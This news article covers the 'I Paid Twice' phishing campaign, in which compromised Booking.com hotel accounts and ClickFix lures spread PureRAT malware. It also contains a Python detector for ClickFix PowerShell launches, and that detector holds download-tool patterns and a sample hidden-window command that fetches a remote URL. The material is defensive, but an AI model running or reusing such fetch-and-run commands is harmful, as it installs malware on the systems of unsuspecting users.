Cybercriminals have launched a highly convincing phishing campaign targeting both Booking.com hotels and their guests, exploiting stolen credentials, compromised accounts, and realistic messages that appear to come directly from the platform. According to Sekoia.io, this global campaign – dubbed “I Paid Twice” – has been active since at least April 2025 and remains ongoing, affecting hospitality businesses and travelers worldwide.
According to Sekoia, the attack begins with compromised Booking.com partner accounts, typically belonging to hotels or property managers. Threat actors use these legitimate accounts to send fraudulent messages via email or WhatsApp, making their communication appear authentic. Victims receive messages containing accurate reservation details such as booking IDs, guest names, and check-in dates, which further increases their credibility.
The messages warn of alleged payment verification or booking issues, prompting guests to “reconfirm” their banking details through a malicious link. Once clicked, victims are redirected to a phishing page mimicking Booking.com’s payment portal, where their personal and financial information is stolen.
Behind the scenes, investigators found that many hotel systems were previously infected with infostealing malware, likely PureRAT (PureCoder’s Remote Access Trojan), which harvested booking credentials and granted attackers ongoing access to hotel booking dashboards.
ClickFix: A Sophisticated Infection Chain
The campaign employs a multi-stage social engineering technique known as ClickFix, which tricks victims into executing a malicious PowerShell command under the guise of a CAPTCHA verification step. Once executed, this command downloads and installs PureRAT malware, giving attackers full control over the system.
PureRAT enables extensive surveillance and manipulation, including keystroke logging, webcam access, data theft, and remote control of infected devices. Infected hotel systems are then used to send new waves of phishing messages, creating a self-sustaining fraud loop that spreads rapidly across the hospitality sector.
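As an added example (not from the article or the Sekoia report), the following Python heuristic scans process-creation records for the ClickFix pattern described above: a PowerShell one-liner launched from an interactive parent such as the Run dialog that hides its window, carries an encoded command, or fetches a remote payload. Field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1 conventions, and the sample events are constructed.

```python
"""Heuristic detector for ClickFix-style PowerShell launches (added example)."""
import re

# Indicators typical of a pasted "verification" command. Field names follow
# Sysmon Event ID 1 (assumption); adapt them to your EDR's schema.
DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|"
                             r"downloadstring|downloadfile|curl|wget)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Parents that indicate a human typed or pasted the command (Win+R, cmd).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}


def score_event(event: dict) -> list:
    """Return the heuristics an event trips (empty list = benign)."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe", "mshta.exe")):
        return []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    hits = []
    if parent in INTERACTIVE_PARENTS:
        hits.append("interactive-parent")   # typical of a Run-dialog paste
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden-window")
    if ENCODED.search(cmd):
        hits.append("encoded-command")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("download-cradle")
    return hits


def is_clickfix_like(event: dict) -> bool:
    """Alert only when an interactive launch also shows evasion or fetching."""
    hits = score_event(event)
    return "interactive-parent" in hits and len(hits) >= 2


# Constructed sample events, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/verify"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Backup\agent.exe",
     "CommandLine": "powershell -File C:\\scripts\\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_like(ev), score_event(ev))
```

Requiring the interactive parent plus one more indicator keeps scheduled administrative scripts, like the second sample, out of the alert queue.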
The Underground Cybercrime Economy
Sekoia analysts discovered that Booking.com credentials and partner accounts are being openly traded on Russian-speaking cybercrime forums. These credentials—sold individually or in bulk—can fetch anywhere from $5 to $5,000 depending on the account’s value, the number of managed properties, and the volume of bookings.
One threat actor, known as moderator_booking, has reportedly earned over $20 million selling stolen booking accounts and logs. These marketplaces also advertise “log checking” tools, enabling criminals to test whether stolen credentials remain valid, further industrializing the exploitation process.
This reflects a broader professionalization of cybercrime. Attackers now outsource specific stages of their operations, such as credential harvesting, traffic distribution, and phishing kit development, to specialized partners in what’s known as a “cybercrime-as-a-service” ecosystem.
Impact on Hotels, Guests, and the Industry
The implications for the global hospitality industry are significant. Hotels risk losing customer trust, suffering financial damages, and losing access to their Booking.com portals. Guests face potential credit card fraud, data breaches, and identity theft.
This campaign highlights how trust-based platforms—where users rely on verified brands for secure transactions—can become high-value targets for cybercriminals once insider credentials are compromised.
In regions like the Middle East and Africa, where the travel and tourism industry plays a key economic role, such attacks could have broader repercussions. Many hotels rely heavily on Booking.com and similar platforms for bookings, making them particularly vulnerable if cybersecurity hygiene is weak or outsourced.
10 Key Recommendations for Hotels and Security Teams
- Implement Multi-Factor Authentication (MFA) for all Booking.com and related partner accounts to prevent unauthorized access.
- Conduct regular cybersecurity awareness training through trusted programs such as Saintynet Cybersecurity Training to educate staff about phishing and social engineering.
- Restrict administrative privileges and continuously monitor account activity for unusual logins or behavior.
- Patch systems and update antivirus software regularly to detect and block malware such as PureRAT and QuirkyLoader.
- Monitor outgoing emails and network traffic for signs of compromised systems being used to send phishing messages.
- Verify all communication channels with customers—ensure messages are sent exclusively through secure Booking.com interfaces.
- Avoid clicking on links or attachments in unsolicited emails that claim to concern booking or payment issues.
- Backup business data frequently and store it securely offline to ensure quick recovery in case of compromise.
- Engage a trusted cybersecurity partner such as Saintynet Cybersecurity for managed threat monitoring, detection, and response.
- Report phishing incidents immediately to Booking.com support and national cybersecurity authorities to help prevent further attacks.
Conclusion
As the hospitality industry continues its digital transformation, phishing and malware-based frauds are evolving into targeted, organized, and highly profitable ecosystems. The “I Paid Twice” campaign is a stark reminder that even trusted platforms can become conduits for cybercrime when threat actors weaponize legitimate accounts.
Cybersecurity teams, hotel operators, and travelers alike must remain vigilant, investing in security awareness, endpoint protection, and proactive monitoring. Defending digital trust requires collaboration between platforms, cybersecurity firms, and users, because the cost of paying twice is far greater than one missed reservation.